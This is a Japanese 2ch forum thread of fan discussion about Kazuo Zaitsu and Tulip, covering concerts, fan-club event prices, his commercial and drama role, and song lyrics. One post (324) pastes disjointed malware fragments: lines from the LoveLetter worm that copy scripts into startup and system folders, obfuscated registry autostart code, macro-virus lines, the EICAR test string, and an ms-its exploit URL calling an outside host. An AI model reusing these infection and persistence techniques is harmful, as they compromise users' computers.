304は僕が儲けたから悔しいんでしょ?
たくさんコンサートやって儲けて何が悪いんですか?
日本がいやになった。変な国になってきている。
頑張る人、税金いっぱい払った人をたたえる、そうあるべきじゃないんですかね?


309 :NO MUSIC NO NAME:2006/06/14(水) 22:07:11 ID:vZGD5Udu
いいぞ!村上

310 :NO MUSIC NO NAME:2006/06/14(水) 22:15:28 ID:W1NWvAxB
なっちゃんのCM見
ました。感激です。
いろんなCMにはよく
出てますがバラエテ
ィーにも出てほしい!

311 :NO MUSIC NO NAME:2006/06/14(水) 22:57:28 ID:3ybReRb6
相変わらずsage方も覚えられず
改行がめちゃくちゃですな
内容もキモッ

312 :NO MUSIC NO NAME:2006/06/15(木) 00:42:26 ID:oAKIZCrC
どうにもならない、いやな時代さ♪

うれしか たのしか♪

313 :NO MUSIC NO NAME:2006/06/17(土) 08:46:02 ID:7Y5AA4t0
ファンクラブのイベント(トーク&ライブ)の件、俺は頭にきています。
ファンクラブ限定だなんて、夫婦で30年来のファンなのに、女房一人しかファンクラブに入って無いもんね、
せめてファンクラブ+1名にしてほしいよ。
子供も連れていけんじゃん、三人子供がいたら三人ともファンクラブに入らんといけんのかい!




314 :NO MUSIC NO NAME:2006/06/17(土) 10:38:48 ID:H7wxvdZt
これを機に、ファンを止める、というのはいかが?

315 :NO MUSIC NO NAME:2006/06/17(土) 15:41:44 ID:GsS94hKj
>>313

事務所に問い合わせてみたら?家族はだめか?って。

316 :NO MUSIC NO NAME:2006/06/17(土) 16:30:35 ID:KPvP55Nb
>>313
そうね、聞くだけ聞いてみたら?駄目モトで。
子供までは無理かもしれないけど、夫婦なら。
ファンのための感謝祭なんだもの。

317 :NO MUSIC NO NAME:2006/06/17(土) 23:47:36 ID:H7wxvdZt
>>316
>>ファンのための感謝祭なんだもの。

えっ?そうなの?

318 :NO MUSIC NO NAME:2006/06/17(土) 23:56:30 ID:eO0ZERaH
どう考えても、財津家の金儲けの為のイベントにしか思えん。

319 :NO MUSIC NO NAME:2006/06/18(日) 06:20:31 ID:PSgpLpZ9
>>316
逆だよ、ファンが教祖様に感謝する集会なんだよ。


320 :NO MUSIC NO NAME:2006/06/18(日) 08:16:11 ID:AioxGmAv
>>319
違うだろ!!

321 :NO MUSIC NO NAME:2006/06/20(火) 20:20:31 ID:v3jMFO7O
ステージセット、照明、PA、警備のバイト、リハーサル代、
メンバーのギャラ、その他もろもろの経費がかかるライブが6000円台で、
そんなものは一切いらないトークライブが8000円。
どう見ても集金目的です。本当にあり(ry

322 :NO MUSIC NO NAME:2006/06/20(火) 21:38:30 ID:DnD3Hkdz
Z氏を個人的(家)によんだらいくらかかるの?

323 :NO MUSIC NO NAME:2006/06/20(火) 22:05:55 ID:6HcWVVdt
>>322
Zと知り合いになればプライスレス

324 :NO MUSIC NO NAME:2006/06/20(火) 23:40:00 ID:AUhU/UVP
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

325 :NO MUSIC NO NAME:2006/06/25(日) 00:37:23 ID:im51sPSN
財津氏の声は美しいよね。
あの歌声を聞いてファンになったけど、匹敵する人はあんまりいないと思う。
最近の人の声は似てるのばっかりというか個性がない感じがする。
その点財津氏は唯一無比。だから今も生き残ってるんだろうな。
97年再結成時までの伸びる声は文句なかっただけにそれ以降の衰えは残念だった。
でもやっぱり味のある声なんだよな。
ずっと聞き続けられるアーティストだと思う。

326 :NO MUSIC NO NAME:2006/06/26(月) 19:10:01 ID:pOU0vTCW
いつまでも変わらずにいてほしいす。

327 :NO MUSIC NO NAME:2006/06/26(月) 19:48:26 ID:FTHvc5nC
>>325
97年以降はほんとに声でなくなっちゃたよね。
だからこの頃からのアルバムは悲しくてほとんど聴いてない。

328 :NO MUSIC NO NAME:2006/06/27(火) 00:43:55 ID:btJnjt2W
なっちゃんのCMの曲ってCMオリジナルですか?

329 :NO MUSIC NO NAME:2006/07/08(土) 01:57:56 ID:BnTnkDTX
口を開けても声が出ない。
慌てる僕に、ヲタがうなずく。
大勢。

330 :NO MUSIC NO NAME:2006/07/13(木) 01:22:30 ID:GHn66HaX
>>323
Z氏と知り合いになりたい

331 :NO MUSIC NO NAME:2006/07/13(木) 07:00:15 ID:Hot9QGWK
>>321
俳優のファン・イベントでも一万円はするんですけど・・・
トーク&質問コーナー&握手会

332 :NO MUSIC NO NAME:2006/07/13(木) 20:44:01 ID:xU/xL/7L
間近でトーク聞けて、握手もしてもらえるなら安い。

333 :NO MUSIC NO NAME:2006/07/24(月) 16:28:16 ID:lLAb+h5j
Z氏のご子息ってなんでデビュしないの?
DNAから言っても才能あると思うんだけどなぁ〜

334 :NO MUSIC NO NAME:2006/07/24(月) 20:11:00 ID:JSTIxitP
何の才能?
まさか、音楽じゃないよね。

335 :NO MUSIC NO NAME:2006/07/25(火) 09:11:38 ID:6UbZcF8J
>>333
ヒント:長嶋の息子 野村の息子 落合の息子



336 :NO MUSIC NO NAME:2006/07/26(水) 22:19:19 ID:5Fi5G+Nv
長嶋・野村・落合>>||越えられない壁||>>財津

337 :NO MUSIC NO NAME:2006/07/27(木) 23:37:52 ID:/kyUY8LN
>>333
あんた、リアル財津Jr.の作詞作曲の歌でも聴いたことあんのかよ
DNAだけで才能、デヴュー、って単細胞にもほどがあるよ
前にも財奥ageして浮いてたもんな
信者もそこまでいくとドン引きするわ。


338 :NO MUSIC NO NAME:2006/07/28(金) 08:42:07 ID:EOOdOt6B
で、当然337は財津の息子の作った曲を聞いたことがあるんだよな?

339 :NO MUSIC NO NAME:2006/07/28(金) 18:57:01 ID:x+fU6Eh6
>>338
おまえは小学生並みに読解力のない奴だな。
>>337は何を根拠にして財津の息子がデビューできるんだよと聞いてるんだろ。
息子の曲聞いた事あるのかって、そりゃこっちのセリフだよ。






340 :NO MUSIC NO NAME:2006/07/30(日) 21:16:54 ID:DrtLnFc3
先日のラジオで、TULIPの作品は来年のアルバムで区切りをつける
ようなニュアンスの発言がありましたね。
わたしはコーラスの厚い曲が好きなので、ソロよりグループの曲が
好きなので残念な気もしますが、年齢的なものもあるのかな。
財津ソロは大人の恋愛物がたまりませんが。

341 :NO MUSIC NO NAME:2006/07/31(月) 22:52:18 ID:NRtWCjrS
来年までもつかな。

342 :NO MUSIC NO NAME:2006/08/08(火) 19:05:19 ID:Wr7wrXqV
CM見て思うのは、もうちょっと若々しい格好してもいいんでは・・

343 :NO MUSIC NO NAME:2006/08/08(火) 23:06:22 ID:LQhSYRsD
昔 財津さんの白いシャツに憧れたなあ。

344 :NO MUSIC NO NAME:2006/08/14(月) 06:49:23 ID:f1sszple
CM。映像的にかなり地味。ファンだから「あっ財津さんだっ!姫野やっぱ太いっ」って思いながらでもCMに注目するが…。そうじゃない人たちの意識を向けるためには演出やファッション、その他まだまだ考えるべき事があったはず…白髪染めたりw

345 :NO MUSIC NO NAME:2006/08/15(火) 07:42:48 ID:Dn9uClJR
ブログであったよ
http://brainbuster.cocolog-nifty.com/tulip/cat5732481/index.html

346 :NO MUSIC NO NAME:2006/08/15(火) 23:49:28 ID:v5m4TmwH
ageて個人のブログの直リンやめれ!

347 :NO MUSIC NO NAME:2006/08/17(木) 10:50:19 ID:Ln8et39T
「償いの日々」が一番好きだ。80年代独特のアレンジ。何処行った?原みどり…

348 :NO MUSIC NO NAME:2006/08/18(金) 06:57:15 ID:u/To4/mk
カラオケでよくお客さんが歌ってましたw

349 :NO MUSIC NO NAME:2006/08/19(土) 01:22:13 ID:fVtjuj7z
>>345
テレビ見ないもんだから、はじめて「なっちゃん」の曲聴いたが、ダセー曲だな。
あと、財津は天狗だよ。昔も今も。

350 :NO MUSIC NO NAME:2006/08/19(土) 12:47:23 ID:Ya2ezY1+
CM曲インパクトないしねー あれだけ才能あったのに

351 :NO MUSIC NO NAME:2006/08/21(月) 00:52:25 ID:AbCMGl3i
「なっちゃん」はアレンジとボーカルを担当
財津さんが作ったわけではありません。

352 :NO MUSIC NO NAME:2006/08/21(月) 05:52:14 ID:+1jpQpBq
なるほど
もう作曲能力すらないってわけだね。

353 :NO MUSIC NO NAME:2006/08/22(火) 16:39:09 ID:krS797na
     ,、
     i 丶  , -‐ォ
     ゙、   ゙レ'´  丿
      ー〃-一'
     _/ |_        ナエトル復旧活動実施中
   ,イレへヘ厶
  r "   ,...、 h      みなさんナエトルを選んで
  | , ,   i 0 l ├ 、、
  〉    匕シ /´ヽ::や、   存分に萎えましょう。
  ト、  , -‐‐′ ノ::、」 ム
  `ヾー ′ _,,.ィ´`ー, ─ヨ
    `¨¨農 |  |,  t
      ム,/`,,トへ孑トへ,}
     └-'  └‐┘ 'ー'′


354 :NO MUSIC NO NAME:2006/08/22(火) 19:34:12 ID:FbBJGaLt
作曲能力、もう無いのかなぁ・・・。

355 :NO MUSIC NO NAME:2006/08/22(火) 19:39:39 ID:7BCY/VZS
子作り能力は・・・。


356 :NO MUSIC NO NAME:2006/08/23(水) 16:17:14 ID:aQQUf1Xw
もうない。

357 :NO MUSIC NO NAME:2006/08/23(水) 16:35:31 ID:ta1jCTZw
>>355
音大のホストに引き継がれた

358 :NO MUSIC NO NAME:2006/08/24(木) 22:01:08 ID:w/F/iYIw
息子さんってホストなんですか!?

359 :NO MUSIC NO NAME:2006/08/27(日) 22:49:10 ID:1MMGTTd6
財津が土9のドラマに綾瀬の父親役で出るらしい。
ソースはドラマ板。

360 :NO MUSIC NO NAME:2006/08/28(月) 10:25:02 ID:tBZfVD1n
「たったひとつの恋(仮)」
出演者
ヒロト (20) 亀梨和也(KAT-TUN)
修理工。死んだ父が残した横浜の小型船舶修理工場で、叔父らと共に働いている。
生活苦から水商売をしている母と、病弱な弟レン(12)の三人暮らし。
一見不良っぽくて無骨で寡黙な印象だが、実は家族思いの心根の優しい青年。
女性に対しても一途で真摯。アユタとコウは高校時代の同級生。
ナオ (20) 綾瀬はるか
横浜元町の有名ジュエリーメーカーの一人娘。現在お嬢様大学2年生で教育学部に在学。
教師を目指している。お嬢様然とした感じがなく、かしこまった事が苦手。
気取りの無いさばさばした性格。恋愛に対する考え方は真面目。合コンなどに積極的に
参加する事も無く、運命のただ一つの恋を待ち続けている。そのため彼氏いない歴20年。
コウ (20) 田中聖 (KAT-TUN)
長距離トラックの運転手。明るく元気なガテン系男子。しかし、実際はナイーブなロマンチスト。
恋愛映画が大好きで、音楽はラブソング一筋。
運転中ドスのきいた声で歌いまくっている。
ユウコ (20) 戸田恵梨香
ナオと同じ大学の親友。地方出身でごく普通のサラリーマン家庭の娘。
仕送りとアルバイトでややリッチな1LDKに一人暮らしをしている。
恋愛には積極的で合コン好き。イマドキの女の子
アユタ (20) 平岡祐太
やや裕福な家庭の息子で、2流と3流の間の大学に通っている。
ルックス、性格ともいいが優柔不断なため彼女なし。虫の心臓の持ち主
横浜のお洒落なハーバーカフェでアルバイト中。
達也(24) 要潤
ナオの父(55)財津和夫
亜紀子(52)余貴美子


361 :NO MUSIC NO NAME:2006/08/28(月) 11:29:25 ID:qncvESnl
財津一郎だろ。

362 :NO MUSIC NO NAME:2006/08/28(月) 13:01:44 ID:qncvESnl
横浜元町の有名ジュエリーメーカーの役なんだ。
ほ〜〜、90年代のスーツ着たカッコいい財津さんに逢えるのかな〜?

363 :NO MUSIC NO NAME:2006/08/28(月) 13:44:36 ID:h74sJq58
ID:qncvESnl の豹変ぶりにワロタ

364 :NO MUSIC NO NAME:2006/08/28(月) 16:25:37 ID:L2KmzIQi
思い出に替わるまでの演技ははっきり言って下手だったけど
ドラマ的には凄いヒットだった。

365 :NO MUSIC NO NAME:2006/08/28(月) 16:49:29 ID:EsGRL93S
主題曲もおねがいします

366 :NO MUSIC NO NAME:2006/08/28(月) 17:06:15 ID:yXSbo5SE
たっ恋スレ

http://ex13.2ch.net/test/read.cgi/tvd/1156667656/l50

367 :NO MUSIC NO NAME:2006/08/28(月) 23:19:45 ID:UpsjSSqS
ドラマかあー

368 :NO MUSIC NO NAME:2006/09/06(水) 19:40:04 ID:XOTdP8ZE
おっさんになっても好奇心旺盛な財津さん頑張れ!

369 :NO MUSIC NO NAME:2006/09/06(水) 21:17:44 ID:mcVq0Pul
おっさんになっても好奇心旺盛な財津さんくたばれ!

370 :NO MUSIC NO NAME:2006/09/07(木) 20:24:32 ID:KVmCP132
CM、ドラマ…その次はバラエティー番組に出たらブレイクするかも

371 :NO MUSIC NO NAME:2006/09/07(木) 21:57:44 ID:hw4lFkYL
そこに愛はあるのかい?

372 :NO MUSIC NO NAME:2006/09/18(月) 00:30:44 ID:axeCarE7
恋ならあるけど。

373 :NO MUSIC NO NAME:2006/09/20(水) 15:48:03 ID:aIo8T+gq
今日、日テレのザ ワイーに財津さんがインタブー受けてますた
色んな話してて若い時のテレビ出演の苦い話とか
最後に
チューリップは来年でなくなるかもしれない…
だからやれる時にやっときたい。と話されてますた
明日からキリンのCMの新バージョンが流れるのとアルバム二枚が発売されるとの事
ジャケットの赤と青はビートルズを意識したようです


374 :NO MUSIC NO NAME:2006/09/24(日) 19:40:48 ID:d9heBvba
次の東京 Z・イベントっていつだっけ?

375 :NO MUSIC NO NAME:2006/09/24(日) 23:27:54 ID:0ujP1FNq
>374
28日(木)だよ。

376 :NO MUSIC NO NAME:2006/09/25(月) 08:37:53 ID:UHJ4vQbs
>>375
さんきゅ

377 :NO MUSIC NO NAME:2006/09/26(火) 18:28:15 ID:vCCgT6Yz
イベントで歌った曲なかなかいいね

378 :NO MUSIC NO NAME:2006/09/26(火) 18:34:33 ID:BPv4Aq6G
ヒッジョウ二、キビシ〜!

379 :NO MUSIC NO NAME:2006/09/28(木) 02:43:16 ID:OVUMlVi2
この人の歌は不思議だ
父親くらいの年齢だし、詳しく知らないけど
偶然耳にすると、いつも泣いてしまう
ライブとかないのでしょうか
一度、生の歌を聞いてみたいです

380 :NO MUSIC NO NAME:2006/09/28(木) 08:57:53 ID:LGIwdXb8
>>379
一郎さんの歌ですか?

381 :NO MUSIC NO NAME:2006/09/29(金) 00:16:50 ID:7kybwMxU
おススメ音源。

ttp://www.komatomo.com/tv/logo/CLICK2.png

382 :NO MUSIC NO NAME:2006/10/01(日) 13:59:54 ID:4G+AMxmv
ドラマでの財津の演技に期待!

383 :NO MUSIC NO NAME:2006/10/01(日) 14:04:46 ID:eIeS6D8G
いえ、期待はしてません。暖かくみまもる事にします。

384 :NO MUSIC NO NAME:2006/10/04(水) 18:57:12 ID:OYpsKGs4
「今だから」の音源が欲しい
http://plaza.rakuten.co.jp/musiccd0408/diary/200607030003/

385 :NO MUSIC NO NAME:2006/10/04(水) 22:51:18 ID:pLoSMGzC
>>384
財津ファンの友達にもらえば。いないの?いないんだね。

386 :NO MUSIC NO NAME:2006/10/05(木) 20:15:43 ID:3B3M0Sy+
>>384
かな〜り前に処分した。
捨てたか売ったかは覚えていないけど。
メンバーは豪華だけど、曲はどうってことないし。
プレミアなんてついてないよ。
ヤフオクで探せば安く買えるよ。
まぁ、音を確認するだけの価値しかないし。

387 :NO MUSIC NO NAME:2006/10/06(金) 18:43:46 ID:meGsyM2z
「今だから」の場合プレミアは誰かが死なないとダメらしい。
その前に一番頑丈そうなユーミンが世界進出くらいしておいてだね

388 :NO MUSIC NO NAME:2006/10/06(金) 23:06:52 ID:ADfiANTj
ムリ。

389 :NO MUSIC NO NAME:2006/10/13(金) 22:23:25 ID:m8pPu8kS
明日からだね

390 :NO MUSIC NO NAME:2006/10/17(火) 07:29:39 ID:56BaWMUG
お父さんはいつもそうやって



うそつき

391 :NO MUSIC NO NAME:2006/10/17(火) 14:14:05 ID:+WfjduNA
陽水の個人事務所に空き巣。
金庫の中の切手が盗まれる???

392 :NO MUSIC NO NAME:2006/10/20(金) 03:23:27 ID:heg8AvIg
「今だから」は中古レコード屋歩き倒せばあるんじゃないの?
俺はそうやって手に入れたけど。。。

財津ファンにとって「City swimmer]ってどんな印象なのでしょうか?
実は財津のアルバムで一番好きなアルバムなんだけど。。
彼のチャレンジがある意味成功した最後のアルバムのような気がするので。

チューリップ初期からのファンの人にとっては、
彼が「終わった」後のアルバムという位置づけになるんでしょうか?


393 :NO MUSIC NO NAME:2006/10/20(金) 18:33:45 ID:nsdTHTgC
「City swimmer]おしゃれな感じ。

他のミュージシャンに曲書いて貰ったのは
自身煮詰まってたのかもしれない。
ちょっと一息ついて力抜いたところがいい!!
『つぐないの日々』は何度聴いてもいい!!

>彼が「終わった」後のアルバム
何?

394 :NO MUSIC NO NAME:2006/10/21(土) 03:01:49 ID:+WVXAxVB
>>393
ごめんなさい、「終わった」ってのは、
チューリップ初期からのファンの人にとっては、
ある意味、彼の最盛期が過ぎた後の「アルバム」って言う位置づけ
になるのかなと言う意味での「終わった」です。

71年生まれの自分にとっては、実は俺が生まれて初めて買ったアルバムが、
このアルバムで、ここから初期にさかのぼりして行ったので、
初期をリアルタイムに聞いていた人にとっての、このアルバムの
位置づけはどうなのかなって聞いてみたくなったので。。。

悪く言おうといて「終わった」って書いたんではないです。
嫌な感じに受け取ってしまったならすみません。。。

煮詰まるくらい、新しい物を模索し続ける彼が好きだったんですけどね。
そういう意味で、最近の彼を見ると、もっと頑張ってくれよ。。
って思ってしまうのですが、、、
歳だから仕方がないといわれれば、そうですが、、、


395 :NO MUSIC NO NAME:2006/10/21(土) 18:35:46 ID:U05kkA3n
私はシングルアイアイアイが出たときに終ったと思いました。

396 :NO MUSIC NO NAME:2006/10/22(日) 11:45:54 ID:PAG7JY1D
「City swimmer」
いいよね。財津が曲書いてないから。

397 :NO MUSIC NO NAME:2006/10/22(日) 21:24:01 ID:Tc/pm+3i
「償いの日々」
いいよね。財津が半分しか歌ってないから。


398 :NO MUSIC NO NAME:2006/10/23(月) 01:55:34 ID:STZ9Zeqf
City swimmerは財津さんが作ったんじゃなかったっけ?

399 :NO MUSIC NO NAME:2006/10/23(月) 12:03:01 ID:S9fqbsmo
Zさんです。

400 :NO MUSIC NO NAME:2006/10/23(月) 21:20:03 ID:aTMh7Zyz
青春の影ねちっこく歌わないで欲しいのですが。。

401 :NO MUSIC NO NAME:2006/10/24(火) 19:17:51 ID:EcC0CudQ
カールスモーキー石井が再結成コンサートで
「皆さん!!解散は撤廃しました。コメコメは永遠ですっ!!」
って叫んでた。

いーなー、おいしいとこ持ってったな、こめこめ。


402 :NO MUSIC NO NAME:2006/10/26(木) 18:22:22 ID:VrLYHVrM
財津さんも再結成って言葉にこだわらなければよかったのに、と思う。
いちいち再結成強調して解散しなくては、って感じに持ってったから
続かないんだよ。

こめこめみたいに早いうちにもう再結成じゃないよ〜宣言しときゃよかったのに。

403 :NO MUSIC NO NAME:2006/10/26(木) 22:11:38 ID:g+S4Qs23
来年のツアーでtulipはおしまいなんですかねー?
見られるだけ追っかけようかな?

404 :NO MUSIC NO NAME:2006/10/27(金) 08:21:52 ID:0kluM8BQ
ゴダイゴも“完全復活”宣言!

   おまえには↑この言葉がないんか!!

405 :NO MUSIC NO NAME:2006/10/27(金) 09:32:28 ID:qahHiblg
安部さんが日本で音楽活動を長く続けるつもりないから完全復活はないよ。
余生をインドで暮らせるだけの金を稼げたらそれでいいみたい。

406 :NO MUSIC NO NAME:2006/10/28(土) 22:38:53 ID:4UVY6tW9
たかぞうを見たら殴りたい

407 :NO MUSIC NO NAME:2006/10/29(日) 10:02:05 ID:r6C9Cczv
なんで?

408 :NO MUSIC NO NAME:2006/10/29(日) 11:56:55 ID:MEHVtYVC
見なきゃ殴らなくて済むよ。

409 :NO MUSIC NO NAME:2006/10/30(月) 20:43:13 ID:p7/ZNLbL
人妻の私に近づかないで。

410 :NO MUSIC NO NAME:2006/10/31(火) 23:39:48 ID:WhStoz4d
人を殴ったら犯罪だよね。

411 :NO MUSIC NO NAME:2006/11/02(木) 00:57:02 ID:ywGslpSi
『City swimmer』Book offで1,300円で売ってた。

買いかな?

412 :NO MUSIC NO NAME:2006/11/03(金) 21:10:04 ID:mhnsmHYR
高いな。

413 :NO MUSIC NO NAME:2006/11/04(土) 22:57:27 ID:UVR+vfi1
今日のドラマ、黒財津っぽくてこれからが楽しみになってきた。

414 :NO MUSIC NO NAME:2006/11/05(日) 01:53:05 ID:N5tYEnG3
財津が亀無しを殴ったら神

415 :NO MUSIC NO NAME:2006/11/05(日) 13:16:47 ID:Tm6jvGDo
亀梨くんを殴るなんてお父さんキライ!
とか娘に言われそうだからヤランだろw

416 :NO MUSIC NO NAME:2006/11/06(月) 20:09:56 ID:8gRXLiDe
殴るキャラじゃないし

417 :NO MUSIC NO NAME:2006/11/07(火) 08:24:18 ID:wAzi8LNk
亀君の写真をおそるおそる開いた時の指が綺麗だった。

手たれかもしれないけど。

418 :NO MUSIC NO NAME:2006/11/12(日) 16:37:59 ID:Rq9hpPFW
                     .∩___∩  
                    /       \|  
                    | ●   ●  丶   歳食ったわりに演技力進歩してねぇな!!
    ハハハ            ミ  (_●_ )    |   なんつったりしてな!
                   /´、 |∪|    、彡        
  ∩_∩  ∬         (  <`\ ヽ/  _  丶   ガハハハハハ!
 ( ´∀`) ∩    ∬    \_)  |  ▽(___)       
 (つ= つ▽  ,,,。,;;;。,,,//   /  /    | 
  と_)_) ▼ ( ̄ ̄ ̄ ̄)  (__(____)


419 :NO MUSIC NO NAME:2006/11/15(水) 02:17:24 ID:WkxqLSpH
愛の見える二人の場所へ行こう〜♪

っていう歌詞のある曲名どなたか知りませんか?教えて下さい

420 :NO MUSIC NO NAME:2006/11/15(水) 12:13:07 ID:Mj976SBV
>>419
つ「ラブストーリーを君に」

421 :NO MUSIC NO NAME:2006/11/15(水) 12:29:25 ID:WkxqLSpH
>>420 ありがとうございます。助かりました。

422 :NO MUSIC NO NAME:2006/11/19(日) 20:57:51 ID:B8Hndbjf
財津さんだんだんいい演技になってきましたよ。

423 :NO MUSIC NO NAME:2006/11/21(火) 08:47:43 ID:x804bfrZ
質問があります
青春の影という曲は別れの曲ですか?

424 :NO MUSIC NO NAME:2006/11/21(火) 13:29:25 ID:f3XG5XOk
違います。
これから二人で頑張ろうね、というポジティブな歌です。

425 :NO MUSIC NO NAME:2006/11/21(火) 16:30:45 ID:x804bfrZ
d。2番の歌詞が気になってしまって・・・ポジティブな場で使わせて
いただきます。

426 :NO MUSIC NO NAME:2006/11/21(火) 21:18:40 ID:mDzSaf2n
2番の歌詞って?

別れの言葉あったっけ。。(゚.゚)

427 :NO MUSIC NO NAME:2006/11/22(水) 03:25:53 ID:cHyvP0QY
ただの女とかただの男とかがなんとなく別れっぽい気がするかもしれん

428 :NO MUSIC NO NAME:2006/11/22(水) 07:25:44 ID:gJ/slrn0
ふ〜〜ん

429 :NO MUSIC NO NAME:2006/11/22(水) 08:24:16 ID:e/HDP56q

愛を知ったために涙がはこばれて
君のひとみをこぼれた時
恋のよろこびは愛のきびしさへの
かけはしにすぎないと

ただ風の中にたたずんで
君はやがて見つけていった
ただ風に涙をあずけて
君は女になっていった


このへんかな?

430 :NO MUSIC NO NAME:2006/11/22(水) 10:19:36 ID:PujTgEQC
>>429
恋してる時は有頂天に楽しいけど
それが愛にバージョンアップするといつまでこの幸せが続くのか
不安もついてくるよね。

愛を守りとおす事はきびし〜!!

431 :NO MUSIC NO NAME:2006/11/23(木) 18:53:30 ID:TdLXzmMC
次はコミカルなドラマにもトライして!

432 :NO MUSIC NO NAME:2006/11/23(木) 19:01:34 ID:6v4x4Csp
心の旅って財津がリードボーカルとったほうがいいよね

433 :NO MUSIC NO NAME:2006/11/23(木) 23:08:35 ID:qaBcb8A1
福岡の新天町っていう商店街の、抽選会の特賞が
財津和夫ニューイヤーコンサートにご招待なんだよね。
心の旅とサボテンがずっと流れてた。

434 :NO MUSIC NO NAME:2006/11/24(金) 00:30:32 ID:JvqFgZbr
>>433
当たるといいね。

コンサートの様子もおしえてね。

435 :NO MUSIC NO NAME:2006/11/25(土) 05:23:57 ID:oWMtNFQ5
うわぁ〜これじゃあ一話短縮も仕方ないわな

今期連ドラ平均視聴率中間成績発表(前期平均視聴率からの増減ポイント順)
-減増 -今期 -前期 --局・枠 ---タイトル(前期タイトル)-----
=【前期比増加枠】======================================
+8.69P|21.60|12.91|CX*木22|Dr.コトー診療所2006(不信のとき〜ウーマンウォーズ)
+8.52P|18.03|*9.51|NTV水22|14才の母〜愛するために生まれてきた(CAとお呼びっ!)
+7.03P|12.50|*5.47|EX*金21|家族〜妻の不在・夫の存在〜(レガッタ)
+3.83P|18.07|14.24|CX*月21|のだめカンタービレ(サプリ)
+3.64P|13.32|10.28|TBS金22|セーラー服と機関銃(タイヨウのうた)
+1.00P|*8.30|*7.30|EX*木21|だめんず・うぉ〜か〜(下北サンデーズ)
+0.85P|*9.80|*8.95|CX*火21|役者魂!(ダンドリ。〜Dance☆Drill)
+0.65P|17.58|16.93|CX*火22|僕の歩く道(結婚できない男)
=【【前期比減少枠】】======================================
-0.07P|13.03|13.31|EX*木20|おみやさん(新・科捜研の女)
-1.65P|*8.75|10.40|TBS日21|鉄板少女アカネ!!(誰よりもママを愛す)
-3.26P|*8.77|12.03|TBS木22|嫌われ松子の一生(花嫁は厄年ッ!)
-4.00P|*7.15|11.15|EX*金23|アンナさんのおまめ(黒い太陽)



-7.28P|11.63|18.91|NTV土21|たったひとつの恋(マイ★ボス マイ★ヒーロー)


436 :NO MUSIC NO NAME:2006/12/31(日) 20:59:10 ID:IzDuWbFS
過去のライブ音源をCD化して〜!

437 :NO MUSIC NO NAME:2007/01/04(木) 02:36:25 ID:WH2tYaMT
自分で焼けば?

438 :NO MUSIC NO NAME:2007/01/18(木) 20:18:18 ID:Kr145Bdd
僕はライオンのコード進行っていい感じで大好きだ!なんか懐かしい感じで・・・気のせい?

439 :NO MUSIC NO NAME:2007/01/22(月) 20:49:41 ID:oO2WsgEM
アコースティックライブに入ってた、スカイラインのCMソングが好きでした。

440 :NO MUSIC NO NAME:2007/01/25(木) 19:00:55 ID:mqFAsZOj
ドラマ「ひとつ屋根の下」見ててファンになった人っていますか?
俺はその一人です。

441 :NO MUSIC NO NAME:2007/01/26(金) 23:40:50 ID:mBYTjOBJ
財津カス夫

442 :NO MUSIC NO NAME:2007/01/26(金) 23:41:48 ID:mBYTjOBJ
再結成は おおお〜 罪津の趣味〜♪

443 :NO MUSIC NO NAME:2007/01/27(土) 01:22:13 ID:BZXm0Tsp
今日から『ひとつ屋根の下』再放送

444 :NO MUSIC NO NAME:2007/01/27(土) 15:45:52 ID:8a24O0Og
ドラマ「ひとつ屋根の下」
最初と最後に2回もサボテンが流れるなんて凄いおいしかったよね。
最後で毎回泣けたな。

445 :NO MUSIC NO NAME:2007/01/31(水) 23:43:02 ID:7OX2XNkZ
【音楽】チューリップ35年間の活動に終止符
http://news21.2ch.net/test/read.cgi/mnewsplus/1170194651/



新スレ
〜チューリップの音楽を語ろう!〜 4
http://music6.2ch.net/test/read.cgi/legend/1170220958/

446 :NO MUSIC NO NAME:2007/02/04(日) 01:25:32 ID:jJLqm35J
初めて生で聞いたのはLove map のツアーだった。その頃(二期)の音が今でも一番好きだ。そして自分にはその歌の上手さ、演奏、センスすべてが神様のように雲の上の存在だった。生で聞く財津さんの声 レコードの何倍もよすぎる感激もの。

447 :NO MUSIC NO NAME:2007/02/04(日) 01:43:43 ID:jJLqm35J
ステージでは演奏中阿部さんと宮城のギターネックをぶつけ合うパフォーマンス、「明日天気になれ」のツインGも良かった!「I am the・・」のラストのギターソロも最高。バックのピアノ、キーボードは電車をイメージ?していい雰囲気だったし

448 :NO MUSIC NO NAME:2007/02/04(日) 01:55:36 ID:jJLqm35J
とにかく盛り上がるアレンジ。また名曲「光の輪」では財津さんの声、歌のキレはもちろんのこと阿部さんのフランジャーのきいた音がまたいい。客席に向けるライトの演出にも感動しました。とにかく何もかも良かった!

449 :NO MUSIC NO NAME:2007/02/05(月) 01:18:56 ID:0bD74WX5
阿部さんではなく安部さんでしょ!

450 :NO MUSIC NO NAME:2007/02/05(月) 11:44:35 ID:EBd22m52
安倍といえばセミァコ!でもSGのほうが似合ってたなぁ。音もいいし・・あの頃雑誌でヤマハのエフェクター使ってるの見て、ローンでボスのセット買ったの後悔!今まで使ってたギターはインドに持っていくのかな?

